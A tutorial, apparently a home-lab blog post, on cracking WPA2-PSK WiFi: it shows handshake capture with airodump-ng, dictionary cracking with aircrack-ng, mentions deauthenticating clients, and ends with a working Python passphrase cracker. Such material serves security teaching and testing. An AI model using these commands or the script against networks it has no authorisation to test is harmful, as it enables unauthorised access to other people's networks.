Hack WiFi With Encryption WPA2-PSK Using Kali Linux
Jo
Today I am going to show you how to crack a WiFi network protected with WPA2-PSK using Kali Linux. The attack captures the WPA2 four-way handshake with airodump-ng and then runs a dictionary attack against it with aircrack-ng, so it only succeeds when the passphrase is in your wordlist. The whole process is a handful of commands typed into the Kali Linux terminal.
First, what are WPA2-PSK and WEP?
- WPA means Wi-Fi Protected Access; WPA2-PSK is its second version in pre-shared key mode, where every client uses the same passphrase
- WEP means Wired Equivalent Privacy, the older and thoroughly broken scheme
Procedure :-
Step 1:-
The very first step is to verify the router configuration.
Normally in a real penetration test we don’t have this option, but since I am
using a home laboratory I have a little more flexibility.
In my case the laboratory access point is secured with
WPA2-PSK. Its passphrase is Cisco123. You can use any kind of
wireless router to make your wireless laboratory.
Use an old router, open its settings and set the wireless security to WPA2-PSK
so it can act as the victim router. Connect one other PC, tablet or
smartphone to it wirelessly, because we need a client that authenticates to the AP:
the encrypted four-way handshake between the two is what has to be sniffed.
The main purpose of this attack is to capture that four-way handshake using a
tool called “airodump-ng”. This is different from the WEP attack, where the goal is
to collect as many encrypted data packets as possible because each one carries a
three-byte Initialization Vector (IV) that leaks key material. WPA2 cracking needs
only one complete handshake. Once we have it, we run aircrack-ng on the captured file,
which tests candidate passphrases against the handshake to find out the password.
Step 2:-
The iwconfig command shows the wireless cards
attached to the system. Currently I am using a Realtek wireless card. Linux ships with
the Realtek drivers, making it a plug and play wireless card on Linux.
Step 3:-
My next step is to enable the wireless interface.
This is done by entering the ifconfig wlan0 up command (on newer Kali releases
that no longer ship ifconfig, use ip link set wlan0 up instead).
Step 4:-
I need to check which wireless networks my wireless card
can see. I will issue the iwlist wlan0 scanning command.
This command forces the wireless card to scan and report on
all wireless networks available nearby.
You can see in my example I have
found my target network, which is going to be Wireless Lab. It has also found
the MAC address (BSSID) of my access point, which is 0E:18:1A:36:D6:22. Take a note of this
because I want to limit my attack to this specific access
point.
Secondly, we see the AP is transmitting on channel 36. This is
important because it tells us which wireless channel we want
our wireless card to monitor and capture traffic from. Channel 36 is in the
5 GHz band, so the card used for the attack must support 5 GHz as well; a
2.4 GHz-only card will never see this handshake.
Step 5:-
Our next step is to put the wireless card into monitor
mode. After doing this your wireless card will be able to examine all the
packets in the air, not only the ones addressed to it.
The monitor interface is created using airmon-ng. Enter the
airmon-ng command without arguments to verify airmon-ng sees your wireless card. If it
lists processes that could cause trouble (NetworkManager, wpa_supplicant), run
airmon-ng check kill first so they do not keep changing channels under you. Then
create the monitor interface by entering the command: airmon-ng start wlan0
Next, run the ifconfig (or iwconfig) command to check that the monitor
interface has been created. In my case mon0 was created; current versions of
airmon-ng name it wlan0mon instead, so use whichever name your system shows in
the commands that follow.
Step 6:-
Using airodump-ng we have to capture the WPA2 handshake. The
attacker has to catch a client while it authenticates to get a valid capture. Airodump-ng
will tell you when it has captured a complete handshake: the confirmation
“WPA handshake: <BSSID>” appears in the upper right hand corner of the screen.
Note:-
We will connect a client to the wireless
network manually to force a handshake. In an upcoming post I will show you how to
force a reauthentication so a device disconnects and reconnects
automatically without any manual intervention.
The general form of the command is: airodump-ng --bssid <AP MAC> (to capture packets only from our AP) --channel <channel> (to stop airodump-ng hopping between channels) --write <prefix> (the name of the file we will save to) <monitor interface>
For my lab that is:
airodump-ng --bssid 0E:18:1A:36:D6:22 --channel 36 --write BreakingWPA2 mon0
(make sure each option starts with two dashes and no space between them: --bssid, not - -bssid)
To capture the handshake you need to observe a client
legitimately authenticating to the network. However, it is not necessary to wait
for that to happen on its own. You can also force an already connected client to
re-authenticate by deauthenticating it; it will reconnect and perform a fresh handshake.
When you see the “WPA handshake:” indicator followed by your AP’s BSSID you can consider
that you have captured a valid handshake.
Step 7:-
We are going to use aircrack-ng with a dictionary file to
crack the password. Your probability of breaking the password depends entirely on the
password file: aircrack-ng derives the key from each candidate and checks it against the
captured handshake, so a passphrase that is not in the wordlist cannot be recovered this way.
The command is: aircrack-ng -w “name of your dictionary file” “name of cap file you
created”
Before cracking, you can confirm the capture really holds a handshake by running
aircrack-ng on the .cap file with no -w option: it lists the networks found and shows
“WPA (1 handshake)” next to the ones you can attack. If the file contains several
networks, add -b 0E:18:1A:36:D6:22 to select ours.
The BreakingWPA2-01.cap file was created when we ran the airodump-ng command (airodump-ng appends -01 to the prefix and increments it on every run). The valid WPA2 handshake airodump captured is stored in this .cap file.
BackTrack 5 comes with a basic dictionary. The dictionary
file darkc0de.lst is a popular wordlist that ships with BackTrack 5. I have
added my password Cisco123 to this file to make the test run a little smoother.
Many attackers use
large dictionaries that increase their chances of cracking the password. Many
dictionaries contain passwords from real users and websites that have been cracked
and posted on the Internet. Some sophisticated dictionaries combine multiple
languages, permutations of each word, and key words and phrases from social
media sites such as Twitter and Facebook.
Kali does not come with the dictionary darkc0de.lst, but if
you need it you can download it from here
NOTE:-
Kali does have built-in wordlists in:
/usr/share/wordlists
(the largest one, rockyou.txt, is shipped compressed as rockyou.txt.gz and must be unpacked with gunzip before use)
In this tutorial I have created a file named “sample.lst”
and added the word Cisco123 in it.
Success:
If the password is in the dictionary file, aircrack-ng will crack it and print
KEY FOUND! [ Cisco123 ]. If it is not, aircrack-ng reports that the passphrase was not
in the dictionary; letting it run longer does not help, only a better wordlist or
rule-based candidate generation will.
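To see why the wordlist decides everything, here is what aircrack-ng does with the capture and the dictionary, as an added example that is not part of the original tutorial: for each candidate passphrase it derives the PMK (PBKDF2-HMAC-SHA1 over the SSID), expands it into the PTK using the two MAC addresses and the two nonces from the handshake, and recomputes the MIC of message 2; a match means the candidate is the key. The SSID, BSSID and passphrase Cisco123 are the lab values above; the client MAC, the nonces and the EAPOL frame are constructed in the code because there is no real .cap file here (aircrack-ng reads ANonce from message 1 and SNonce plus the MIC from message 2 of the capture).

```python
import hashlib
import hmac
import struct

# Lab values from the tutorial; the client MAC and nonces are constructed for this example.
SSID = "Wireless Lab"
AP_MAC = bytes.fromhex("0E181A36D622")
CLIENT_MAC = bytes.fromhex("AABBCCDDEEFF")   # constructed, not a captured address
ANONCE = bytes(range(32))                     # constructed; real nonces are random
SNONCE = bytes(range(32, 64))                 # constructed

# EAPOL-Key layout: 4-byte EAPOL header, descriptor type(1), key info(2), key length(2),
# replay counter(8), nonce(32), IV(16), RSC(8), ID(8), MIC(16), key data length(2)
MIC_OFFSET = 81
MIC_LEN = 16


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """IEEE 802.11i PRF-n: concatenated HMAC-SHA1(key, label || 0x00 || data || counter)."""
    out = b""
    counter = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([counter]), hashlib.sha1).digest()
        counter += 1
    return out[:nbytes]


def derive_ptk(pmk: bytes, ap_mac: bytes, client_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """CCMP PTK is 384 bits; its first 128 bits are the KCK that authenticates the handshake."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf(pmk, b"Pairwise key expansion", data, 48)


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """WPA2 (key descriptor version 2): MIC = HMAC-SHA1(KCK, frame with MIC field zeroed)[:16]."""
    zeroed = frame[:MIC_OFFSET] + b"\x00" * MIC_LEN + frame[MIC_OFFSET + MIC_LEN:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:MIC_LEN]


def build_msg2(snonce: bytes, mic: bytes = b"\x00" * MIC_LEN) -> bytes:
    """Message 2 of the four-way handshake (client -> AP), with an empty key data field."""
    # RSN descriptor (2), key info Pairwise|MIC|version 2 (0x010A), key length 0, replay counter 1
    body = struct.pack(">BHHQ", 2, 0x010A, 0, 1)
    body += snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8 + mic + struct.pack(">H", 0)
    return struct.pack(">BBH", 2, 3, len(body)) + body   # EAPOL version 2, type 3 (Key), length


def make_lab_capture(passphrase: str = "Cisco123") -> bytes:
    """Constructed stand-in for the message 2 frame airodump-ng would write to BreakingWPA2-01.cap."""
    ptk = derive_ptk(pmk_from_passphrase(passphrase, SSID), AP_MAC, CLIENT_MAC, ANONCE, SNONCE)
    unsigned = build_msg2(SNONCE)
    return build_msg2(SNONCE, eapol_mic(ptk[:16], unsigned))


def crack(ssid, ap_mac, client_mac, anonce, snonce, frame, wordlist):
    """Dictionary attack: recompute the MIC under each candidate and compare with the captured one."""
    captured = frame[MIC_OFFSET:MIC_OFFSET + MIC_LEN]
    for candidate in wordlist:
        ptk = derive_ptk(pmk_from_passphrase(candidate, ssid), ap_mac, client_mac, anonce, snonce)
        if hmac.compare_digest(eapol_mic(ptk[:16], frame), captured):
            return candidate
    return None   # passphrase not in the wordlist: exactly the failure mode described above


def demo(wordlist=("password", "cisco", "Cisco123", "admin123")):
    """Run the attack against the constructed capture with a small constructed wordlist."""
    return crack(SSID, AP_MAC, CLIENT_MAC, ANONCE, SNONCE, make_lab_capture(), wordlist)


if __name__ == "__main__":
    print("KEY FOUND!", demo())
```

The cost of the attack is the PBKDF2 step: 4096 HMAC-SHA1 rounds per candidate, per SSID, which is why precomputed tables only work for one network name and why the size and quality of the wordlist matter more than anything else.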